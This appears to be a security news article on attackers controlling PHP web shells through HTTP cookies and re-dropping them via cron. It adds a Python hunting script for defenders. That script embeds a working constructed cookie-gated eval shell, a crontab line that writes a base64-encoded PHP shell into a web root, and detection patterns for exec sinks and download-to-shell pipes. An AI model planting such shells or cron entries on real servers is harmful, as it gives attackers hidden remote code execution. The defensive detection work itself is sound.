Microsoft security researchers report that threat actors are using HTTP cookies to control PHP web shells on Linux servers, giving them remote code execution on the compromised hosts.

Rather than accepting commands in the URL or POST body, where they are easy to spot, the shell checks for a cookie value the attacker supplies and only executes when that value is present. This gating lets the operator keep access while the requests look like ordinary traffic to any control that inspects the request line rather than the headers.

The Microsoft Defender Security Research Team's write-up also describes how the attackers use cron jobs on the Linux servers to persist the web shells. A practitioner caveat follows from that: deleting the PHP file alone is not a clean-up, because the scheduled job that drops it has to be removed as well.

Because the control channel is the Cookie header, the shell's traffic is invisible to detections that key on URLs, query strings, or POST bodies. Apache's and nginx's default combined log format records the request line, referer and user agent but not cookies, so the access log shows only benign-looking requests. Catching this needs cookie-aware logging at the web server or proxy, or inspection of the traffic itself, alongside host-side hunting for the shell and its cron entry.
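As an added example (not Microsoft's detection logic and not any sample from its report), the Python script below shows the two host-side checks a responder would run after reading this: a static scan of PHP files for cookie input in a file that also calls a code or command execution sink, and a scan of crontab text for jobs that write PHP under a web root or pipe a download into an interpreter. The sample shell, the benign cookie-reading file and the crontab lines are constructed for the demonstration; the sink list and web-root path patterns are heuristics chosen here, not indicators from the report.

```python
"""Hunt for cookie-gated PHP web shells and the cron entries that re-drop them.

Added example, not Microsoft's tooling. Heuristics only: a hit means
'look at this file', not 'this is a web shell'.
"""
import re
import sys
from pathlib import Path

# Constructed sample in the shape the article describes: execution is gated on a
# cookie value the attacker supplies, and the payload also arrives in a cookie, so
# the request line recorded in the access log looks like an ordinary GET.
SAMPLE_SHELL = r"""<?php
if (isset($_COOKIE['k']) && $_COOKIE['k'] === 'c0ffee') {
    @eval(base64_decode($_COOKIE['p']));
}
"""

# Constructed benign file that also reads a cookie, to show the heuristic stays quiet on it.
SAMPLE_BENIGN = r"""<?php
$lang = $_COOKIE['lang'] ?? 'en';
echo htmlspecialchars($lang, ENT_QUOTES);
"""

# Constructed crontab: one normal job and one that re-creates a PHP file under the web root
# (the base64 string is just a constructed one-line shell, used to show the re-drop pattern).
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/apt-get -y update
*/10 * * * * echo 'PD9waHAgQGV2YWwoJF9DT09LSUVbJ3AnXSk7' | base64 -d > /var/www/html/.cache.php
"""

COOKIE_READ = re.compile(r"\$_COOKIE\b")
# Functions that turn a string into code or a command (heuristic list chosen for this example).
EXEC_SINK = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function)\s*\(", re.I)
DECODER = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I)
# Paths assumed here as typical web roots; adjust for the host being examined.
WEBROOT_WRITE = re.compile(r"(/var/www|/srv/www|htdocs|public_html)\S*\.ph(p|tml)\b")
PIPE_TO_INTERP = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|php)\b")


def scan_php_source(src: str) -> list[str]:
    """Return human-readable findings for one PHP source text (empty list = nothing flagged)."""
    findings = []
    if COOKIE_READ.search(src) and EXEC_SINK.search(src):
        findings.append("$_COOKIE is read in a file that also calls a code/command execution sink")
        if DECODER.search(src):
            findings.append("payload is decoded (base64/gzip/rot13/hex) before execution")
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a web root and return {path: findings} for every .php file that trips the heuristic."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue
        findings = scan_php_source(src)
        if findings:
            hits[str(path)] = findings
    return hits


def scan_crontab(text: str) -> list[str]:
    """Return crontab lines that write PHP under a web root or pipe a download into an interpreter."""
    suspicious = []
    for line in text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if WEBROOT_WRITE.search(entry) or PIPE_TO_INTERP.search(entry):
            suspicious.append(entry)
    return suspicious


if __name__ == "__main__":
    print("constructed shell:", scan_php_source(SAMPLE_SHELL))
    print("constructed benign:", scan_php_source(SAMPLE_BENIGN))
    print("constructed crontab:", scan_crontab(SAMPLE_CRONTAB))
    # Optional: pass a real web root to scan it (e.g. /var/www/html).
    if len(sys.argv) > 1:
        for path, findings in scan_tree(sys.argv[1]).items():
            print(path, findings)
```

Run it with a web root as the argument to scan a real tree, and feed it the output of `crontab -l` for each user plus the files under /etc/cron.d to cover system cron. A hit is a prompt to read the file, not a verdict: legitimate code reads cookies all the time, and some frameworks call exec-like functions, so the signal is the combination of the two in one short file, especially one that was recently created or that sits outside the application's normal directories.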

Microsoft's recommendations are the expected ones: continuous monitoring of the servers and threat detection tooling that can see both host activity (new PHP files, crontab changes) and web-layer activity (requests carrying unusual cookies), so that a shell is caught whether it is found on disk or in traffic.

Web shell tradecraft keeps moving toward blending in with normal traffic, and this cookie-gated variant is one more step in that direction; defenders need to track these shifts and adjust what they log and what they look for accordingly.

Source: Original Article